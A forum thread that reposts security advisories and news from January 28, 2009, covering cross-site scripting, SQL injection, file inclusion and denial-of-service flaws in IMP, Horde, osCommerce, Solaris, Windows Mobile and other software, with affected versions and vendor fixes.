Spyware, Viruses, & Security forum

General discussion

VULNERABILITIES \ FIXES - January 28, 2009

IMP Cross-Site Scripting and Script Insertion Vulnerabilities


Release Date: 2009-01-28

Critical:
Moderately critical
Impact: Cross Site Scripting

Where: From remote
Solution Status: Vendor Patch


Software: IMP Webmail Client 4.x

Description:
Some vulnerabilities have been reported in IMP, which can be exploited by malicious people to conduct cross-site scripting or script insertion attacks.

Certain input passed to smime.php, pgp.php, and message.php is not properly sanitised before being used or returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

The vulnerabilities are reported in versions prior to 4.2.2 and 4.3.3.

Solution:
Update to version 4.2.2 or 4.3.3.

Provided and/or discovered by:
The vendor credits Gunnar Wrobel.

Original Advisory:
http://lists.horde.org/archives/announce/2009/000484.html
http://lists.horde.org/archives/announce/2009/000485.html

Discussion is locked
You are posting a reply to: VULNERABILITIES \ FIXES - January 28, 2009
The posting of advertisements, profanity, or personal attacks is prohibited. Please refer to our CNET Forums policies for details. All submitted content is subject to our Terms of Use.
Track this discussion and email me when there are updates

If you're asking for technical help, please be sure to include all your system info, including operating system, model number, and any other specifics related to the problem. Also please exercise your best judgment when posting in the forums--revealing personal information such as your e-mail address, telephone number, and address is not recommended.

You are reporting the following post: VULNERABILITIES \ FIXES - January 28, 2009
This post has been flagged and will be reviewed by our staff. Thank you for helping us maintain CNET's great community.
Sorry, there was a problem flagging this post. Please try again now or at a later time.
If you believe this post is offensive or violates the CNET Forums' Usage policies, you can report it below (this will not automatically remove the post). Once reported, our moderators will be notified and the post will be reviewed.
Collapse -
CA Anti-Virus Engine Archive Files Detection Bypass

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Not critical
Impact: Security Bypass

Where: From remote
Solution Status: Vendor Patch


Software: BrightStor ARCserve Backup 11.x
BrightStor ARCserve Backup 11.x (for Microsoft SQL Server)
BrightStor ARCserve Backup 11.x (for Open Files)
BrightStor ARCserve Backup 11.x (for Oracle)
BrightStor ARCserve Backup 11.x (for Windows)
BrightStor ARCserve Backup Client Agent 11.x
CA Anti-Spyware 2007
CA Anti-Spyware 2008
CA Anti-Spyware 8.x
CA Anti-Virus 2007 (8.x)
CA Anti-Virus 2008 (9.x)
CA Anti-Virus for the Enterprise 8.x
CA Anti-Virus Gateway 7.x
CA Anti-Virus SDK
CA ARCserve Backup 12.x
CA Common Services (CCS) 11.x
CA eTrust Intrusion Detection 4.x
CA Internet Security Suite 2007
CA Internet Security Suite Plus 2008
CA Protection Suites 2.x
CA Protection Suites 3.x
CA Threat Manager 8.x
CA Unicenter Network and Systems Management (NSM) 11.x
CA Unicenter Network and Systems Management (NSM) 3.x
eTrust EZ Antivirus 6.x
eTrust EZ Antivirus 7.x
eTrust Intrusion Detection 2.x
eTrust Intrusion Detection 3.x
eTrust Secure Content Manager (SCM)



Description:
Some weaknesses have been reported in various CA products, which can be exploited by malware to bypass the scanning functionality.

The weaknesses are caused due to errors in the handling of various archive file formats within the Arclib Archive Library ("arclib"), which can be exploited to bypass the anti-virus scanning functionality via specially crafted archive files.

Solution:
The vendor has released arclib version 7.3.0.15 in September 2008, which has been deployed via automatic updates (please see the vendor advisory for details).

Provided and/or discovered by:
The vendor credits Thierry Zoller and Sergio Alvarez of n.runs AG.

Original Advisory:
CA (CA20090126-01):
https://support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=197601

Collapse -
Domain Technologie Control Multiple SQL Injection Vulnerabil

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Less critical
Impact: Manipulation of data

Where: From remote
Solution Status: Vendor Workaround


Software: Domain Technologie Control 0.x

Description:
Some vulnerabilities have been reported in Domain Technologie Control, which can be exploited by malicious users to conduct SQL injection attacks.

Input passed to the "familyname", "christname", "company_name", "phone", "fax", "addr1", "addr2", "addr3", "zipcode", "city", "state", and "vat_num" parameters in client/new_account.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Fixed in repository.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
Freshmeat:
http://freshmeat.net/projects/dtc/?branch_id=22759&release_id=292973

Collapse -
GraphicsMagick DIB and BMP Denial of Service Vulnerabilities

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Less critical
Impact: DoS

Where: From remote
Solution Status: Vendor Patch


Software: GraphicsMagick 1.x


Some vulnerabilities have been reported in GraphicsMagick, which can be exploited by malicious people to cause a DoS (Denial of Service).

Solution:
Update to version 1.3.5.

Provided and/or discovered by:
1) Reported in bug report by an anonymous person.
2) Reported by the vendor.

Original Advisory:
http://www.graphicsmagick.org/Changelog.html
http://sourceforge.net/tracker/index....36&group_id=73485&atid=537937

Collapse -
Horde / Horde Groupware Cross-Site Scripting and File Inclus

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Moderately critical
Impact: Cross Site Scripting
Exposure of sensitive information

Where: From remote
Solution Status: Vendor Patch


Software: Horde Application Framework 3.x
Horde Groupware 1.x

Description:
Some vulnerabilities have been reported in Horde and Horde Groupware, which can be exploited by malicious people to conduct cross-site scripting attacks and disclose potentially sensitive information.

Solution:
Update to Horde 3.2.4 or 3.3.3 and Horde Groupware 1.1.5.

Provided and/or discovered by:
The vendor credits Gunnar Wrobel.

Original Advisory:
Horde:
http://lists.horde.org/archives/announce/2009/000483.html
http://lists.horde.org/archives/announce/2009/000482.html

Horde Groupware:
http://lists.horde.org/archives/announce/2009/000486.html

Collapse -
Sun Java System Access Manager User Enumeration Weakness

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Not critical
Impact: Exposure of system information

Where: From remote
Solution Status: Vendor Patch


Software: Sun Java System Access Manager 6.x
Sun Java System Access Manager 7.x

Description:
A weakness has been reported in Sun Java System Access Manager, which can be exploited by malicious people to identify valid user accounts.

The weakness is caused due to an unspecified error in the login module, which can be exploited to determine the existence of valid usernames.

Solution:
Apply patches.

Provided and/or discovered by:
The vendor credits Marco Mella (http://www.aboutsecurity.net).

Original Advisory:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-242026-1

Collapse -
Gazelle CMS "template" Local File Inclusion Vulnerability

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Moderately critical
Impact: Exposure of system information
Exposure of sensitive information

Where: From remote
Solution Status: Unpatched


Software: Gazelle CMS 1.x



Description:
fuzion has discovered a vulnerability in Gazelle CMS, which can be exploited by malicious people to disclose sensitive information.

Input passed to the "template" parameter in index.php is not properly verified before being used to include files. This can be exploited to include arbitrary files from local resources via directory traversal attacks and URL-encoded NULL bytes.

Successful exploitation of this vulnerability requires that "magic_quotes_gpc" is disabled.

This vulnerability is confirmed in version 1.0.

Solution:
Edit the source code to ensure that input is properly verified.

Provided and/or discovered by:
fuzion

Original Advisory:
http://packetstorm.linuxsecurity.com/0901-exploits/gazelle-lfi.txt

Collapse -
Sun Solaris BIND "EVP_VerifyFinal()" and "DSA_do_verify()" S

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Less critical
Impact: Spoofing

Where: From remote
Solution Status: Unpatched


OS: Sun Solaris 10
Sun Solaris 9

Description:
Sun has acknowledged a vulnerability in Sun Solaris, which can be exploited by malicious people to conduct spoofing attacks.

Solution:
The vendor recommends to disable the DSA algorithm in named.conf (please see the vendor's advisory for details).

Original Advisory:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-250846-1

Other References:
SA33404:
http://secunia.com/advisories/33404/

Collapse -
Simple Machines Forum "packages.xml" Cross-Site Scripting

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Less critical
Impact: Cross Site Scripting

Where: From remote
Solution Status: Unpatched


Software: Simple Machines Forum 1.x

Description:
Xianur0 has discovered a vulnerability in Simple Machines Forum, which can be exploited by malicious people to conduct cross-site scripting attacks.

Input read from the "text" and "description" elements in a "packages.xml" file (e.g. when "action" is set to "packageget", "sa" is set to "browse", and "absolute" is set to the web address serving the malicious "packages.xml" file) is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in an administrative user's browser session in the context of an affected site.

This vulnerability is confirmed in version 1.1.7. Other versions may also be affected.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Xianur0

Collapse -
GameScript Cross-Site Scripting and SQL Injection

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Moderately critical
Impact: Cross Site Scripting
Manipulation of data

Where: From remote
Solution Status: Unpatched


Software: GameScript 4.x

Description:
Encrypt3d.M!nd has reported some vulnerabilities in GameScript, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks.

Solution:
Edit the source code to ensure that input is properly sanitised.

Provided and/or discovered by:
Encrypt3d.M!nd

Original Advisory:
http://milw0rm.com/exploits/7893

Collapse -
Sun Solaris "autofs" Kernel Module Denial of Service and Pri

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Less critical
Impact: Privilege escalation
DoS

Where: Local system
Solution Status: Vendor Patch


OS: Sun Solaris 10
Sun Solaris 8
Sun Solaris 9

Description:
A vulnerability has been reported in Sun Solaris, which can be exploited by malicious, local users to cause a DoS (Denial of Service) and potentially to gain escalated privileges.

The vulnerability is caused due to an unspecified error in the "autofs" Kernel Module, which can be exploited to cause "autofs" mounts to break and potentially to execute arbitrary code as the "root" user.

Successful exploitation requires that "autofs" is enabled.

The vulnerability is reported in Solaris 8, 9, and 10 for both the SPARC and x86 platform.

Solution:
Apply patches.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-249966-1

Collapse -
Sun Solaris Pseudo-Terminal Driver Denial of Service

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Not critical
Impact: DoS

Where: Local system
Solution Status: Vendor Patch


OS: Sun Solaris 10
Sun Solaris 8
Sun Solaris 9

Description:
A vulnerability has been reported in Sun Solaris, which can be exploited by malicious, local users to cause a DoS (Denial of Service).

The vulnerability is caused due to a race condition in the Solaris pseudo-terminal driver (pty(7D)) module, which can be exploited to cause a system panic.

The vulnerability is reported in Solaris 8, 9, and 10 for both the SPARC and x86 platform.

Solution:

Apply patches.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-249586-1

Collapse -
Sun Solaris "libike" Library Denial of Service

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Moderately critical
Impact: DoS

Where: From remote
Solution Status: Vendor Patch


OS: Sun Solaris 10
Sun Solaris 9

Description:
A vulnerability has been reported in Sun Solaris, which can be exploited by malicious people to cause a DoS (Denial of Service).

The vulnerability is caused due to an unspecified error in the "libike" library when processing IKE packets, which can be exploited to crash the "in.iked" daemon.

The vulnerability is reported in Sun Solaris 9 and 10 for both the SPARC and x86 platform.

Solution:
Apply patches.

Provided and/or discovered by:
Reported by the vendor.

Changelog:
2009-01-28: Added CVE reference.

Original Advisory:
http://sunsolve.sun.com/search/document.do?assetkey=1-66-247406-1

Collapse -
osCommerce Cross-Site Request Forgery Vulnerability

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Release Date: 2009-01-28

Critical:
Less critical
Impact: Cross Site Scripting

Where: From remote
Solution Status: Unpatched


Software: osCommerce 2.x

Description:
A vulnerability has been discovered in osCommerce, which can be exploited by malicious people to conduct cross-site request forgery attacks.

The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to e.g. create additional administrator accounts by tricking an administrative user into visiting a malicious web site.

The vulnerability is confirmed in version 2.2 Release Candidate 2a. Other versions may also be affected.

Solution:
Do not visit untrusted sites while being logged in to the application.

Provided and/or discovered by:
Russ McRee, HolisticInfoSec

Collapse -
Microsoft boasts 'out of box' IE8 clickjack protection

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Imperfect solution to perfect storm

By Dan Goodin in San Francisco

Analysis Microsoft has beefed up its latest Internet Explorer browser with an "out of the box" feature that it says will protect users against a serious class of attacks that allows maliciously controlled websites to manipulate the links visitors click on.

The new measure, baked into Redmond's first release candidate for IE8, blocks so-called clickjacking attacks, a threat that security researchers warn plagues users of every major browser.

Once lured to a malicious address, a user may think she's clicking on a link that leads to Google - when in fact it takes her to a money transfer page, a banner ad that's part of a click-fraud scheme, or any other destination the attacker chooses. Because it exploits architectural flaws in the internet's core, clickjacking has proved an extremely vexing problem to fix.

More: http://www.theregister.co.uk/2009/01/27/internet_explorer_clickjacking_block/

Collapse -
Numerous security holes in OpenX ad server

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

28 January 2009

Security firm Secunia has reported a total of 22 hitherto unpatched vulnerabilities in the free OpenX ad server. The problems include cross-site scripting holes, cross-site request forgery as well as SQL injection holes, and a file inclusion hole. The latter can only be exploited via files that are stored locally, which reduces the risk of a successful attack. However, it can apparently also be exploited for directory traversing attacks to spy on a system's files. A suitable exploit has already appeared on Milw0rm independently of Secunia's report.

More: http://www.heise-online.co.uk/security/Numerous-security-holes-in-OpenX-ad-server--/news/112509

Collapse -
Windows Mobile Bluetooth vulnerability allows access to any

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

Windows Mobile Bluetooth vulnerability allows access to any files


28 January 2009

A directory traversing vulnerability in the Bluetooth OBEX-FTP server of Windows Mobile 6 allows attackers to access files outside of the permitted list. According to the report, using "../" or "..\\" as part of the path name, is sufficient to traverse to other directories. An attacker could use the technique to copy files from a device, or to install their own software, such as a key logger, or other spyware.

More: http://www.heise-online.co.uk/security/Windows-Mobile-Bluetooth-vulnerability-allows-access-to-any-files--/news/112510

Collapse -
Asymmetric encryption for BlackBerry

In reply to: VULNERABILITIES \ FIXES - January 28, 2009

28 January 2009

Darmstadt-based vendor Corisecio GmbH intends to disperse repeated concerns about the smartphone's security architecture with its Mobile PKI for BlackBerry devices. The product consists of a Certificate Authority (CA) which generates the keys and certificates required for communication, and a client that needs to be installed on the mobile device.

Once all the components are in place, any data synchronisation between the Exchange Server and the BlackBerry device will be AES encrypted. According to the vendor it is also possible to use other CAs, for example Microsoft's standard product.

More: http://www.heise-online.co.uk/security/Asymmetric-encryption-for-BlackBerry--/news/112514

Popular Forums

icon
Computer Newbies 10,686 discussions
icon
Computer Help 54,365 discussions
icon
Laptops 21,181 discussions
icon
Networking & Wireless 16,313 discussions
icon
Phones 17,137 discussions
icon
Security 31,287 discussions
icon
TVs & Home Theaters 22,101 discussions
icon
Windows 7 8,164 discussions
icon
Windows 10 2,657 discussions

SMART HOME

This one tip will help you sleep better tonight

A few seconds are all you need to get a better night's rest.